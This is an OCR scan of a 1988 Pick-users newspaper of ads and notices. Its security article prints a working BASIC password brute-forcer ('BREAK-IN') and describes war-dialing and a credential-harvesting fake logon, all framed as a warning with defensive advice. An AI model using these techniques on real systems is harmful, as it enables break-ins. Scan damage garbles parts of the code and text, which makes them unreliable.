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If your mailing label says 
RENEW, your subscription 
is about to expire! To 
avoid missing your next 
free issue of 
Product Profiles, renew 
IMMEDIATELY by filling 
out and returning the front 
cover coupon for a free 
subscription! The last two 
digits of your mailing label 
indicate the number of the 
last issue you'll receive. 


The free newspl^r for Pick- users. 


Octob.ljo, 1988 


Pragma’s Product Profiled 

is published periodically by 

Semaphore Corporation, 

207 Granada Drive, Aptos, CA 95003, 
(408) 688-9200. 

Entire contents copyright © 1988 by 
Semaphore Corporation. 

All rights reserved. No part of this 
publication may be reproduced in any 
form or by any means without prior 
written permission from Semaphore. 
Semaphore offers no warranty, either 
express or implied, for any losses due to 
the use of any material published. 

Subscriptions are free, hut are available 
only to Pick users with USA mailing 
addresses. Semaphore cannot he 
responsible for lost issues or issues 
returned to us because of address 
changes. 

All material received will he considered 
for publication. Semaphore reserves the 
right to edit all submittals. 

Pick is a trademark of Pick Systems. 
Semaphore Corp. is not affiliated with 
Pick Systems. 
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Company _ 
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City/State _ 
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I use the Pick operating system and my mailing address is in the USA. 
Please continue sending me Pragma's Product Profiles free of charge. 

Signature_ Date_ 

[ ] I also use an Apple® Macintosh™ computer. 
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FREE ADVERTISING 

You can advertise your Pick product 
or service in Pragma's Product Profiles, 
absolutely free and without obligations 
of any kind. Free ads must be black 
and white. Ads will be accepted only in 
the following sizes: 2.75", 4.5", 6", or 
10" wide by 2.75", 6", 9.25", or 12.5" 
high. Ads must be single-piece, un¬ 
mounted, camera-ready positives, such 
as a photostat or velox. Do not send 
mechanicals, multi-piece pasteups, 
mounted artwork, negatives, or film. 
Halftones must be 85-line screens. 

Send your ad to: Semaphore Corp., 

207 Granada Drive, Aptos, CA 95003, 

(408) 688-9200. Materials will not be 
returned. Ads are run at Semaphore’s 
discretion, on a space available basis. 

The smaller your ad is, the better are its 
chances of being published. 

FREE MAGNETIC TAPES 

A few cartons of standard 2400 foot 
1/2" reels of magnetic tape are still 
available while supplies last, compli¬ 
ments of Semaphore Corporation. For 
your FREE tapes, call (408) 688-9200, 
tell us your Federal Express account 
number to use for shipping charges, 
and we’ll send you a carton of ten tapes 
by Standard Air using our packaging. 

The most recent recipients of free 
cartons of tapes include: Lab Force • 

Jalco Services • Intertec Communica¬ 
tions • Welders Supply • San Pablo City 
• Allar-tic Financial • GM Nameplate • 
Russell Distributing • Ed’s West • Excal- 
ibur Technologies • Triad • Wizard 
Software • Systems House • Cox & 

Assoc. • NCAR • YKK USA • Thomas 
Assoc. • Sisco • Serta Mattress. 

FREE GIFT 

Would you like a free gift? Send the 
name, business address, and business 
phone number (as listed in a local tele¬ 
phone directory) of a Pick user working 
at a IWOompany to: Pragma, 207 
GranaJ^^rive, Aptos, CA 95003. The 
company you refer must not already be 
on the Product P rofiles mailing list, you ' 
must include your own mailing label 
from th^&sue, and you should indicate 
you w^^mke a FREE gift. We'll send 
the usSBrsample copy of Product 
Profiles, and we'll send you a gift as 
your reward for the referral. 

Our thanks to the following readers 
for their recent referrals: Robert . 

Norman, Hycor Biomedical • Lisa 
Chaney, Thompson & LaFleur • Bruce 
McAdoo, Southwest Moulding • Jaime 
Godreau, Minicomp Systems • Kenneth 
McConnell, Anthony Pools • Richard 
Davis, Software Firm • Jay Tinker, Omni 
Business • Rick Mokris, Crescendo 
Assoc. • Steven Backman, Backman 
Assoc. 

FREE BACK ISSUES 

A few back issues of Pragma’s 
Product Profiles are still available while 
supplies last: 

#37: Techies Talk Tape Transfers 
#39: A Pop-up Calculator 
#40: The Perfect Environment? 

#41: An F-conv Input Processor 
#42: Automating Shipping Counters 
#43: Two Techies Talk Telecom 
#45: A Software Alarm Clock 
#46: The Alarm Clock Revisited 
#47: When Not To Use B-trees 

To receive your FREE copies, 
indicate which issues you need and 
send a stamped, self-addressed 
envelope with $2.40 postage to: 

Pragma, 207 Granada Drive, Aptos, CA 
95003. 

Does your mailing label say RENEW? 

If so, your subscription is about to 
expire! To avoid missing your next free 
issue of Product Profiles, renew NOW 
by filling out and returning the front 
cover coupon for a free subscription. 

The last two digits of your mailing label 
number indicate the number of the last 
issue you'll receive if you don't renew. 
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Breaking in is easy to do. 

Or is it? 

Do you know a disgruntled data processing worker, recently 
fired, who wouldn’t mind destroying a payroll file just to get 
back at a former employer? Or perhaps you’re heard of 
misguided students, interested in computers, with nothing better 
to do than use modems to dial up computer systems around the 
country, trying to break in? Those are typical profiles of the 
kinds of people who are the biggest threat to the security of a 
computer system. 

Is your installation safe from unauthorized intrusion? 
Probably not, because most Pick systems use simple and very 
insecure methods for controlling access. This article will show 
you just how poor your security is, how easily it can be 
circumvented, and why you should take action and correct your 
security deficiencies now, before someone breaks into your 
system. 

Let’s assume we want to break into your computer. Like 
Pick, most timesharing systems allow access via account names 
and passwords. If we can guess or find a valid account name 
and its password, we’re usually then given access to enough 
other resources, such as programming languages or file 


BREAK-IN 

01 modem%=l : OPEN "COM1:9600" AS modem% 

02 accountS“"SYSPROG" 

03 cr$=CHR$(13) : crlfnull$=crS+CHR$(10)+CHR$(0) 

04 crlfnul2$=crlfnullS+ciTfnull$ 

05 please$=crlfnul2$+"Logon please: "+CHR$(7) 

06 bad.acct$=account$+crifnul2$+"USER-ID?" 

07 lba%=LEN(bad.acct$) 

08 pass.prompt$=account$+crl£null$+"PASSWORD:" 

09 bad.passS=crTfnul2$+"PASSWORD?" 

10 tries%=0 : answer$="" : need%=LEN(pleaseS) 

11 WHILE (tries%<3) AND (answer$oplease$) 

12 answer$=*INPUT$ (LOC(modem%) ,modem%) 

13 PRINT #modem%, cr$; : GOSUB get. answer 

14 tries%=tries% + 1 

15 WEND 

16 IF answer$oplease$ THEN PRINT '■>*-*» logon! " : END 

17 PRINT "Logon prompt detected"; show.time 

18 firstc%=ASC("A") : lastc%=ASC 

19 expected$=pass.promptS+bad.j 

20 need%=IEN(expetf 

21 max.pass.len%=3 : DIM codes%(max.pass.len%) 

22 FOR pass . len%=l TO max.pass. lenj 

23 FOR i%=l TO pass.len% 

24 codes%(i%)=firstc% 

25 NEXT i% 

26 combos%=(lastc%-firstc%+l)"pass.len% 

27 FOR i%=l TO combos% 

28 PRINT #modem%, account?;cr$; 

29 password$="" 

30 FOR j%=l TO pass . len% 

31 password$=password$ + CHR$ (codes% (j-%) ) 

. 32 NEXT j% 

33 PRINT #modem%,password$;cr$; 

3 4 GOSUB bump 

35 GOSUB get. answer 

36 IF answer? <> expectedS THEN 

37 PRINT accounts,- 

38 IF LEFTS(answer?,lba%)=bad.acct$ THEN 

39 PRINT " isn't a valid account!" 

40 ELSE 

41 PRINT " password = ",-passwordS 

42 END IF 

43 END 

44 END IF 

45 NEXT is 

46 PRINT "All passwords of length";pass.len%; 

47 PRINT "have been tried, using" 

48 PRINT CHR$ (firstci)through ";CHR$ (lastc%) ; 

4 9 GOSUB show.time 

50 NEXT pass . len% 

51 PRINT "Password not found!" 

52 END 

53 

54 get.answer: start=TIMER 

55 WHILE ( (TIMER-start)<5) AND (LOC(modem%)<need%) 

56 WEND 

57 answer$=INPUT$ (LOC (modem!.) ,modem%) 

58 RETURN 

59 

60 show.time: PRINT ”. Time = ";TIME$ : RETURN 

61 

62 bump: index%=pass.len% 

63 carry: codes%(index1)=codes%(index%) +1 

64 IF codes*(index*) > lasted THEN 

65 codes*(index%)=firstc% 

66 IF index*>l THEN index%=index%-l : GOTO carry 

67 END IF 

68 RETURN 




manipulation commands, to be able to wreak as much havoc as 
we want. 

How do we find an account and its password? Almost every 
timesharing system has at least one special account name 
present at all installations. At a Pick site, that account is 
SYSPROG, so all that’s left to do is find the password for that 
account. 

First, we should try logging on with no password at all. This 
will work for a surprising number of installations! The next step 
is to try all possible passwords of one character each, then two 
characters, and so on. We’ll probably find that the password is 
no longer than three upper case characters, but that still means 
we may have to try up to 26 x 26 x 26 or 17,576 possible 
combinations of that length. It would be easier to program a 
computer to do the search for us. (Instead of manually typing 
password guesses into the Pick machine’s serial port via a 
terminal, we’ll just plug in a computer instead of a terminal and 
have the computer transmit large numbers of password guesses.) 

For example, the BREAK-IN program shown on this page is 
written in Microsoft BASIC, a language readily available on 
most IBM and Apple microcomputers. BREAK-IN will find the 
password for the SYSPROG account when the micro’s serial port 
is connected to the serial port of a Pick machine. 

In Microsoft BASIC, variables ending with % are integers up 
to 32K, $ symbols are variable-length strings, and other 
variables are reals. Reserved keywords are shown in bold. Line 
1 of the BREAK-IN program begins by opening the serial output 
port so that PRINT# statements will transmit to the Pick 
machine at 9600 baud. PRINT statements with no modem! port 
number will just output to our console’s display. 

Line 2 defines the account we’re trying to break into. The 
target machine prompts with a carriage return, line feed, null, 
carnage return, line feed, null, “LOGON PLEASE: ”, space, and a 
bell when a carriage return is entered at a logged off port, so line 
5 defines those characters as the expected prompt. Line 6 
defines the response to an invalid account name, line 8 is the 
expected response for a valid account name, and line 9 is the 
response to an invalid password. 

The WHILE loop in lines 11 to 15 outputs just a carriage 
return to try and get the target machine to respond with the 
expected logon prompt. Line 12 clears all pending input before 
the carriage return is sentby line 13. 

Line 21 sets up the FOR loop in lines 22 to 50 to trasU 
passwords of length 1 through 3 using characters in t^^fto Z 
range defined by line 18. For a given password lengtn^ne 2 6 

The 

FOR loop in lines 27 to 4 5 tries each password, which is stored 
as an array of ASCII codes in codes!. The account nrae is 
transmitted in line 28, the password is sent by line 3g^Bthe 
expected failure response as defined by lines 19 and ^Wre 
waited for (with a five second timeout) by the get.answer routine 
called at line 35. Note that BREAK-IN is carefully programmed 
to expect account names to be echoed, while passwords are not 
echoed. 

If the target machine doesn’t respond with a warning about a 
bad password, then the account name is invalid or the correct 
password has been found. In either case, the program stops in 
line 43. If the program reaches line 51,max.pass.len! will 
have to be increased in line 21 to try longer passwords, or the 
character range defined in line 18 will have to be widened to 
include other characters, such as lower case letters, digits, or 
non-printing characters. 

Note that the BREAK-IN program can just as easily be written 
in Pick BASIC and modified to be used by one Pick machine to 
break into another. Running on a Macintosh Plus connected to a 
small Zebra, BREAK-IN tries about seven passwords a second. 
Using a compiled version written in Pascal instead of interpreted 
BASIC doubled the speed. At 14 passwords per second, all A-Z 
combinations up to length three can be tried in 22 minutes. 
Length four combinations total almost half a million, but that 
still would take only a little over nine hours at most. 


Semaphore Corporation welcomes 
its newest B-TREE-P customers: 

Ukrops Super Markets Inc. 
Vanguard Physicians Services Corp. 
Sabus Group 
Gastech Inc. 

Healthlink Inc. 

Chesapeake Computer Works 
Weldco-Beales 
Glenayre Electronics 











Products and services from Semaphore Corporation 


B-TREE-P 
indexing tools 
for Pick systems 







STRIDE, integrated 
software for 
manufacturing and 
distribution 


Telefolders 
icon-based bulletin 
boards for Macintosh 
and Pick host 
computers 



Pragma's 
Product Profiles, 
the free newpaper 
for Pick users 
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Mailing list of 
Macintosh users 
in the USA, on labels, 
tapes, or disks 
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Telefolders is software that turns your Macintosh or Pick computer into an iconic bulletin 
board host system. Any Macintosh can dial in or directly connect to your Mac or Pick host, 
and upload and download Mac files. You can control what files callers have access to. 

Unlike text-based bulletin boards, callers see Telefolders host files displayed as standard 
icons, folders, and windows. There are no text menus to read or text commands to type. To 
exchange any Mac program, data, or document with the host, the caller just clicks on the 
desired file icon and selects "Send' or "Receive” from the Mac's pull-down menu. 

Telefolders turns a Macintosh host into a single-user iconic bulletin board. On a Pick host. 
Telefolders supports any number of simultaneous callers sharing the same iconic database, 
plus Telefolders allows password-protected accounts with cash balances and transaction 
histories, folder locking, private folders, "phantom' icons, automatic error retry, and an 
automatic recent acquisitions folder. 

Only Macs can connect to a Telefolders Macintosh host or to a Telefolders Pick host. Your 
copy of the Telefolders host is restricted for use on one computer at a time. 

Telefolders for Mac hosts..••$ 49 

Telefolders for Pick hosts (includes source code)...$995 


B-TREE-P is proven software for using B-trees on your Pick computer. B-trees allow any of 
the data in any of your files to be instantly located and displayed in any sort order, without 
having to wait for SORT or SELECT commands. 

Tired of waiting for your computer to SORT or SELECT your large data files? Need to quickly 
find any attribute? Want to scroll files up or down, in any sort order? With B-TREE-P you can 
instantly search, sort, and scroll any data from any file. 

Now you can instantly look up customers by name, street, ZIP code, or any other field — 
not just by customer number. Now you can immediately find inventory entries by quantity, 
cost, or description — not just by part number. Whatever files you use, now you can instantly 
locate and display your data any way you want, without having to wait for endless SELECTS. 

You can immediately display any record in any file just by typing one or more starting 
characters that match any field in the record. You can display not only a selected record, 
but also any previous and next records, using any sort order you specify. You can jump to 
any record in a file at any time, then browse through the file by scrolling up or down, a_^ 
record at a time or a '"'ge at a time, in any sort order. 

B-TREE-P and a few Aional minor changes to your existing data entry programs are oil 
that is necessary for you to immediately be able to search, browse, or output your data 
quickly and conveniently. Modifications to your existing data files are totally unnecessary. 

B-TREE-P includes alLe^cessary BASIC source code for a B-tree system that works wift yiy 
file. Included are an^ .rtion subroutine, deletion subroutine, lookup subroutine, pre'C „s/ 
next subroutine, and complete instructions. Plus, you receive the source code for a 
complete demonstration system that uses B-TREE-P to maintain a name and address file, 
including an editor program for creating and changing name and address records, a 
browser program for displaying records, and a printer program for listing file items in order 
without having to wait for a sort. 

When you order, we'll send you complete B-TREE-P source code and all necessary 
documentation, along with all back issues of our special B-tree newsletter. B-TREE-P includes 
a license agreement limiting your use of B-TREE-P to one computer at a time. Multi-CPU and 
OEM resale agreements are also available. 

B-TREE-P (includes source code)...$395 


Pragma’s Product Profiles is a newspaper published since 1984, and is distributed free to 
Pick operating system users in the USA. Product Profiles features articles of interest to Pick 
users, and offers free advertising for vendors of Pick hardware, software, and services. Back 
issues can be obtained by sending a stamped, self-addressed envelope. 

Pragma’s Product Profiles .fr®® upon request 


Semaphore's mailing list of Mac users is for anyone who needs names and addresses of 
Macintosh users in the USA. Need labels, diskettes, or mqgnetic tape? Choose and rent any 
quantity from our list of hundreds of thousands of Mac users, with no charge for selecting, 
sorting, media, or delivery. All lists are supplied in ZIP code order, on one-across adhesive 
labels, Macintosh diskettes, or 1600 BPI tape. Mac disks use text-only files, with tab field 
delimiters and carriage return record separators, suitable for importing to most database 
packages. A free HyperCard import stack is included. Mag tape orders require 10,000 
names minimum. Ask for our one-time rental agreement. 

Macintosh user mailing list, per name.59 
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STRIDE is an integrated package of manufacturing and distribution software for General 
Automation Zebra computers using the Pick operating system. 

STRIDE includes 18 modules to automate every aspect of a manufacturing or distribution 
company: accounts payable, accounts receivable, cost accounting, customer service, 
engineering, fixed assets, general ledger, inspection, order entry, payroll, personnel, 
production control, programming, purchasing, receiving, shipping, shop floor, and stock 
room. The production control module includes regenerative Materials Requirement 
Planning. 

STRIDE consists of approximately 200 programs, 350 procs, 80 formatted screens, 655K bytes 
of online user documentation, and 225K bytes of online programmer cross reference 
documentation. The approximately 100 files in STRIDE require 2.5 million bytes of disk space 
for installation. STRIDE uses no assembler code. 

STRIDE has a clean, modular, well-structured, and conceptually integrated design. STRIDE 
simultaneously and correctly updates multiple files as soon as transactions are entered, in 
order to provide a database that is always up to date, and to avoid unfriendly batch-style 
processing. 

STRIDE is well-documented, especially for the programmer. Extensive cross-references 
carefully document all program, proc, and data interdependencies, so that modifications 
are easy and predictable. 

STRIDE includes a license agreement and Semaphore's B-TREE-P package. OEM licenses 
are also available. 

STRIDE, source code and documentation..$9,900 

STRIDE, when purchased with a Zebra.no charge 





Find-a-User is an on-line service that lets you locate Macintosh users in the USA. You can 
look up individual users by name, company, or address, and get a complete mailing address 
and phone number for one-time use. You can copy any size range of names, companies, or 
addresses into your computer and prepare your own mailing. Need all Macintosh users at 
business addresses in Fargo, North Dakota? There are no minimum use requirements, so Find- 
a-User is ideal for getting small lists any time you need them. 

You can access Find-a-User with a modem and any computer or terminal. It's menu driven 
and very easy to You are only charged for the quantity of name or address items 
retrieved during e< _ , call placed at 300,1200, or 2400 baud. Find-a-User accept N ils 24 
hours a day. There are no registration or subscription charges, no connect or acceso 

charges of any kind* 

Ask for our one-; use agreement. Addresses may be used for one-time mailir !>nly. 
Phone numbers may be used for one-time follow-up calls only. Dial (408) 662-2717 with a 
modem and logon to the DEMO account to try looking up actual Find-a-User names, 
absolutely free of charge. 

Find-a-User access, per name.49 



Pragma (not to be confused with Pragma's Product Profiles) is the original 48-page 
technical journal for Pick users published quarterly beginning in August 1982. Each issue is 
packed with software and helpful information, including interviews, complete and 
debugged program listings, and detailed, explanatory articles for readers at all levels of 
experience. All seven back issues are available. Issue #1 is a reprint. 

Pragma, per back issue.$25 
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COMICS is a complete computerized inmate cash and commissary system for jails. 

COMICS stores all necessary inmate cash and commissary records and then lets jail 
personnel instantly display, change, or print those records via any number of high-speed 
display terminals and printers. 

A typical COMICS installation includes terminals in the stores area for use by commissary 
personnel, and terminals at cash receiving and disbursement points, such as booking areas. 
COMICS automatically records all information about every transaction, and computes totals, 
.balances, taxes, and all other necessary calculations. COMICS insures instant posting of all 
inmate cash transactions and commissary sales. COMICS allows accurate cash control and 
fast commissary order processing with a minimum of effort, while completely avoiding all 
paperwork and manual arithmetic. 

COMICS allows a jail to provide better cash control and commissary service with less effort 
and cost, and pays for itself in no time. 

Complete COMICS hardware and software.from $14,300 


Semaphore Corporation • 207 Granada Drive • Aptos, CA 95003 • (408) 688-9200 




















New B-TREE-P installations 
are sprouting up every day! 
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Ukrops Super Markets Inc. • Vanguard Physician Services Corp. • Sabus Group • Gastech Inc. • Healthlink Inc. • 
ChesMpake Computer Works • Weldco-Beales • Glenayr JMjectronics • Educorp • Denticare Inc. • Dealer Soft^^e 
Inc.^^luminum Forge Co. • Business Sciences Inc. • Presronwood Baptist Church • Benefit Systems Inc. • Emerald 
Publications • George R. Smith • William Bloom & Son Inc. • Dana Corp. • Wayne Schachtel Consulting • Sysgen Inc. 

• Bellingham Cold Storage Co. • Concept Systems Inc. • Brigham Young University • Kilo MicroAir • Diversified 
Computer Systems • Chick-Fil-A • Industrial Indemnity • Columbia County • PEC Vectron • Advanced Technology 

Labs. • Arrowhead Water Co. • Mathis & Assoc. Inc. • Tricor America Inc. • Systems House Inc. • Vancouver Sanitary 
Service • Bottom Line Software Inc. • Brown & Caldwell Labs • Colonial Pacific Leasing • Marion County Republicans 

• Augmented Computer Technology • Premisys • Kripalu Center • Rollings Homes Inc. • Computerized Data • 
Ultimate Corp. • Elliott-Pope School • Toyota of Irving • Victory Express Inc. • Compu Components • Monterey County 

• Butterfields • Electronic Business • Kreepy Krauly USA • Tennessee Mat Co. • Zircon Co. Inc. • Smithsonian Institution 
• Call U.S. Inc. • Meditech • Unison Technologies Inc. • Wavetek • Moore Industries • Systems Support Services • 

Aerojet General • Target Supply • Lilyblad Petroleum • Partners National Health Plans • M. Epstein Inc. • Vitek Systems 
Inc. • J & L Industrial Supply Co. Inc. • Century Publishing Co. • Northwest Agricultural Coop Assoc. • Tampa Bay 
Mgmt. Services Inc. • Spectradyne Inc. • Crosstern Corp. • Magic Chef Air Conditioning Co. • Educators Mutual 
Insurance • Samuelson Assoc. Co. • Anthony Pools • Brooks Equipment Co. Inc. • Associated Students UCLA • Laub 
Group Inc. • United Collection Bureau Inc. • Pactel Paging • Access Software Inc. • Bronson & Bratton Inc. • ACS 
Systems Inc. • Topsy’s International Inc. • Opportunities Unlimited • Glastron-Conroy Ltd. • XScribe Corp. • Minnesota 
Trade Office • Berelson Co. • San Mateo County • Creative Computer Services • Livermore Police Dept. • Hubert 
Distributing Co. • Reinsurance Assoc. • Oman Publishing • Capital Software Ltd. • Martin Cadillac Co. Inc. • NORPAC 

• AIPAC • Medical Accounting Systems • Sierra Software Inc. • May Trucking • Shoob Photography • Specialty 
Underwriters Inc. • Specs Music • ADDS Inc. • Excalibur Computer Systems Inc. • City of Irvine • Cornell University • 
Office Works • Assertive Systems • Conston Inc. • Wofford College • Chicago Kenworth • Eye Care & Surgery Center 

• Chandler Lumber Co. • Mark Card • Penn Independent Assoc. Inc. • Condominium Insurance • John Klein & Assoc. 
Inc. • Cooke Data Systems Inc. • Infocel • Multisystems Inc. • Generation Research • Miami Trading Enterprises • 

System Works Inc. • Flynt Systems Corp. • Life & Health Insurance Co. of America • Information Technology 
Consultants • Tel-A-Train Inc. • Data Operating Systems Inc. • Computyme • Stewart Co. • Trudell Trailer Sales Inc. • 
NCAR • Jet Electronics & Technology Inc. • Distributed Logic Corp. • University of California • Casualty Underwriters 

Inc. • Halprin Supply Co. • Long Beach Community Services. 


A burglar breaking in by modem may be forced to work at 2400 baud 
or even just 1200 baud, but all that’s needed to find a vulnerable system 
is a little time and patience, even if the target’s phone number is 
unknown. For example, commonly available “intelligent” modems can 
be program-driven to automatically dial one phone number after 
another, looking for a carrier tone from an answering modem. There 
are only 10,000 possible numbers for a given three-digit phone number 
prefix. With careful tuning of the modem’s timeout parameters, a 
burglar can easily make a modem dial and test a number every few 
seconds. Even at a generous 30 seconds per number, a burglar can find 
every answering modem in a given prefix area in less than four days. 

Even if the burglar doesn’t know a standard account name such as 
S YSPROG, the BREAK-IN program can be changed to try every possible 
account name first, just as it tries every possible password. Inevitably, a 
system will have some easy-to-find account such as X or BOB or TEST. 
(Can you see why Pick and many other systems make it easy for a 
burglar to find an account by requiring a valid account name before 
prompting for a password? A better design is to prompt for a password 
regardless of what account name is entered, then simply reporting 
“invalid account and/or password” if either is wrong. That way, a 
burglar can’t tell if either the account or the password or both are 
wrong. Systems should also not allow an unlimited number of logon 
attempts without somehow notifying the system administrator that 
someone is trying to break in.) 

Even if a burglar gets into one account, but finds it uninteresting or 
limited, it can be used to find other accounts and passwords if the 
account allows programming to be done. The trick is to leave behind a 
custom logon program that prompts for and accepts account names and 
passwords just like the system does, but saves the information in a file 
before performing the requested logon. If done correctly, users won’t 
notice the difference, and the burglar can come back later and find the 
accounts and passwords saved in the file. 

Another problem is that many systems don’t even force a modem 
port to logoff if a caller hangs up without manually logging off first. As 
a result, a burglar can dial in and be logged on without even having to 
provide an account and password! 

So how can a system be set up for better security? Studies have 
shown that most systems use short account names and passwords, if any 
passwords at all. The obvious and most important step to take is to use 
longer account names and passwords, say at least six characters, chosen 
from a large character set, and to change them regularly. For example, 
at 100 passwords per second, generating all possible passwords of six 
upp^ara characters takes over a month. If lower case letters are 
inclflB the required time stretches to over six years! 
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The Communication Link 
is looking for interested persons 
to receive our newsletter, The Monitor 
and attend our meetings. 

We are the Philadelphia area PICK 
user group and would like to reach 
all PICK users in the Delaware Valley area 
and any other people interested in 
receiving our newsletter. 

We currently mail The Monitor to 550 + 
people 10 times per year and hold 
meetings and/or seminars 10 times per year. 

If you would like to receive The Monitor and be 
advised of our meetings please call or write: 


The Communication Link 
370 Commerce Drive 
Ft. Washington, PA 19034 
215/542-9006 


This month’s mailbag 

A better way to index? 

A short program to generate an inverted file with a sequentially incrementing ID appeared in 
Product Profiles #47. Most Pick implementations (if not all) support the use of attribute 9998 
as an item counter. By using the SREFORMAT verb with attribute 9998, one can build the 
same type of inverted file faster without having to write a BASIC program to do it. 

For example, to invert your example PARTS file by description (AMC1), first ensure that the 
dictionary item 9998 is in the Master Dictionary of the account you are working on. If it is not, 
simply create an item referencing attribute 9998 in line 2. A command like the following may 
then be used for the inversion (bold indicates the user’s input): 

>SREFORMAT PARTS BY AMC1 9998 AMC0 
FILE>INDEX 


Pick itself will then proceed to build the index. A simple COUNT of the INDEX file will fairly 
quickly return the total number of items written, and that number plus one can be entered with 
the editor to create the MAXI item needed by your FIND.PARTS browser program. 

This is simply an alternative way of accomplishing the same thing as your FILL.INDEX 
program, but through the use of the operating system itself. The main advantage of this 
approach over the BASIC program is that it would be faster on large files. 

John Strosnider, San Marcos, CA 

We deliberately decided to use FILL. INDEX instead of SREFORMA T because (1) not all 
Pick-style implementations have REFORMAT verbs, (2) the creation of the MAXI item doesn't 
have to be a separate manual step, (3) REFORMA T and SREFORMA T are always dangerous to 
use because if only a carriage return is accidentally hit at the FILE> prompt, the source file 
gets clobbered, and (4) we guessed FILL. INDEX wouldn't be intolerably slower than 
SREFORMAT, even for large files. Anyone care to try some benchmarks? 

Note that if 9998 items aren't available, the equivalent can be created on most systems with 
the NI symbol in a F; or A; correlative. Also, not all versions of Pick automatically look in the 
MDfile if a dictionary word isn't found. In that case, the 9998 item should be placed in the 
PAR TS dictionary, not MD. In any case, if you want to use SREFORMA T, you can still avoid a 
COUNT by doing a SSELECT PARTS instead of SREFORMAT, noticing the number selected, 
then using just a plain REFORMAT, and then creating MAXI using the number reported by the 
SSELEg^plus one. —Editors 
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QUU^PROF, an easy to use, online guide to the PICK 
OS,^Pisists of a master listing of TCL verbs with 
descriptions, proper syntax form, examples, and 
options for each verb — all on the screen 
right in front of you! This online guide is 
accessible to all authorized users from 
all accounts and is easily used with or 
without the menu by a stroke of a key! 

It is a great tool for all users, 
from beginner to expert, at a cost 
of $195 per system. Order your 
copy of QUICK PROF today by 
completing the form below. 

Delivery format is 1/2" 

1600 BPI tape. If you 
need another format, 
call InterComp Corp. 
for a quote at: 

(214) 739-3661. 


Q\0 


YES! 
SEND ME 
QUICK PROF! 

Remit payment 
InterComp Corp 
10670 N Central #750 
Dallas, Texas 75231 


A product of 
InterComp, 
Copyright 
1987 




# of copies X $195 $ 
r 

Sales Tax (Texas only) $_ 


CL* 


Total amount enclosed is $ 


Contact: 

Company: _ 

Address: 


Computer: 


Serial #: 
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VICISSITUDE 


'Webster’s New Dictionary of Synonyms, 
G. & C. Marian Co, 1978 


■fey?!! 




mi 








Economical, error-free transfer of data 
among remote Pick machines was 
finally provided last year by our new 
“Laguna Connection.” 

It offered a new dimension to Pick 
computing and it won the 1987 Pro- 
Gramme Award for “the Best Non¬ 
vertical Support Package of the Year.” 

We’re very proud of that. We’re also 
proud of the “vicissitude” it brought to 
the Pick community! 

For, if the truth be known, the Pick 
community has been reluctant to talk 
about communications. It was a sore 
spot. We had the RS 232 “wired” 


minicomputer years, of course, but we 
couldn’t match the micro-age com¬ 
munications of most other operating 
system environments. And we knew it. 

We’ve changed all that with the 
Laguna Connection. We can do more 
than match those other capabilities; we 
can beat them. 

The “Connection” offers asyn¬ 
chronous, point-to-point communica¬ 
tion between any Pick-equipped system 
regardless of its vendor. It also provides 
spoke networks for every port in the 
system, and you can transfer as much 
data as you wish, any time you wish. 
Auto-dialing is a key feature, and there 
is no need to babysit the data transfer. 


Data movement is tracked and reported 
automatically. (The Laguna Connection’s 
users claim 100 % reliability!) And it is 
economical. All that is needed with the 
“Connection” are modems and 
telephone lines. 

We believe we have more than 
changed the Pick communication 
picture The Laguna Connection 
substitutes a modem communication 
system for an older one, and has com¬ 
pletely reversed the Pick communication 
story. What was once a Pick negative, 


“...a change so great as to seem a substitution for, 
or a reversal of, what has been.”* 


is now a Pick positive With the 
Laguna Connection, Pick-based systems 
can now have the best communication 
capability available today. And that’s 
more than just a simple “change,” 
it’s vicissitude 


See for yourself. Call: 


(800) 437-6347 Toll-free U.S. or 
(714)494-1092 

Laguna Software 
$80-117 Broadway 
Laguna Beach, CA 92651 











